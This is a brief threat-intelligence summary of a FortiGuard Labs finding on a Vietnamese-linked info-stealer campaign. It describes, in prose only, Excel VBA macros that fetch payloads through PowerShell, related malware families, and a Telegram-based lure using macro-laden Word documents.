FortiGuard Labs uncovered a sophisticated malware campaign involving an Excel document distributing an info-stealer, linked to a Vietnamese-based hacker group previously identified in August and September 2023. The attack employs various stages before deploying the info-stealer, including simple downloaders aimed at evading detection. The initial stage involves an Excel document containing a VBA script that executes a PowerShell command to fetch a malicious file from filebin.net.
This campaign extensively leverages open platforms for downloading various components, allowing researchers to gather valuable insights into the tactics and techniques employed by the hacker group. The files retrieved from these platforms reveal shared characteristics with the campaign, such as obfuscated batch files and VBScript files executing PowerShell code. Furthermore, additional repositories linked to the group host various malware strains like XWorm, VenomRat, and RedLine, suggesting broader malicious activities beyond this campaign.
An intriguing aspect of the investigation uncovers clues to another campaign facilitated through a Telegram bot, where victims are lured into enabling macros in a Word document named “done 300coki.docm.” Although the specific file mentioned couldn’t be obtained, the filename hints at the use of cookies as bait. Additionally, researchers identified a Word document containing Facebook cookies and a malicious macro, indicating the multifaceted approach employed by the threat actors to target victims.
